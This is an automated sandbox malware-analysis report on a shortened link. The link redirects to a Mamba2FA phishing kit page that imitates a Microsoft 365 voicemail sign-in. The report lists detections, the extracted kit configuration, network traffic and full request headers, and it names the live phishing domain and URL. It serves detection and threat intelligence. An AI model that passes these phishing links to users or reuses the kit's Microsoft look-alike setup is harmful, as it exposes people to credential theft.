Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t.ly/2jKWO

Overview

General Information

Sample URL:https://t.ly/2jKWO
Analysis ID:1540584
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
AI detected landing page (webpage, office document or email)
Phishing site detected (based on image similarity)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,7542123173083046913,11597805470458725562,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/2jKWO" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_voice", "rand": "dHBDYVg=", "uid": "USER08102024U34100840"}
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-23T23:29:34.194049+020020566432Possible Social Engineering Attempted192.168.2.1649632201.102.105.236443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://t.ly/2jKWOSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
      Source: 1.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_voice", "rand": "dHBDYVg=", "uid": "USER08102024U34100840"}

      Phishing

      barindex
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NMatcher: Found strong image similarity, brand: MICROSOFT
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: Number of links: 0
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: Title: Voice Mail does not match URL
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: Invalid link: Forgot password?
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: Invalid link: Terms of use
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: Invalid link: Privacy & cookies
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: <input type="password" .../> found
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: No favicon
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: No <meta name="author".. found
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49662 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49676 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49679 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.164.15:443 -> 192.168.2.16:49227 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49228 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49229 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49230 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.16:62139 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49226 -> 162.159.36.2:53
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: t.ly to https://new.alex-gps.com/m/?c3y9bzm2nv8xx3zvawnljnjhbmq9zehcrflwzz0mdwlkpvvtrviwodewmjaynfuzndewmdg0ma==n0123n
      Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49632 -> 201.102.105.236:443
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: global trafficHTTP traffic detected: GET /2jKWO HTTP/1.1Host: t.lyConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N HTTP/1.1Host: new.alex-gps.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /m/jsv.js HTTP/1.1Host: new.alex-gps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://new.alex-gps.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /m/jsv.js HTTP/1.1Host: new.alex-gps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: new.alex-gps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://new.alex-gps.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://new.alex-gps.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://new.alex-gps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UpOpLcHcw3dMKAK&MD=2vTvUBNv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
      Source: global trafficHTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UpOpLcHcw3dMKAK&MD=2vTvUBNv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UpOpLcHcw3dMKAK&MD=2vTvUBNv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficDNS traffic detected: DNS query: t.ly
      Source: global trafficDNS traffic detected: DNS query: new.alex-gps.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
      Source: unknownHTTP traffic detected: POST /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N HTTP/1.1Host: new.alex-gps.comConnection: keep-aliveContent-Length: 139067Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://new.alex-gps.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 21:29:37 GMTServer: Apache/2.4.59 (Debian)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: chromecache_78.1.dr, chromecache_77.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
      Source: chromecache_78.1.dr, chromecache_77.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
      Source: chromecache_86.1.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
      Source: chromecache_85.1.drString found in binary or memory: https://fontawesome.com
      Source: chromecache_85.1.drString found in binary or memory: https://fontawesome.com/license/free
      Source: chromecache_78.1.dr, chromecache_77.1.drString found in binary or memory: https://google.com
      Source: chromecache_78.1.dr, chromecache_77.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
      Source: chromecache_77.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49227
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49663
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49662
      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49660
      Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 443
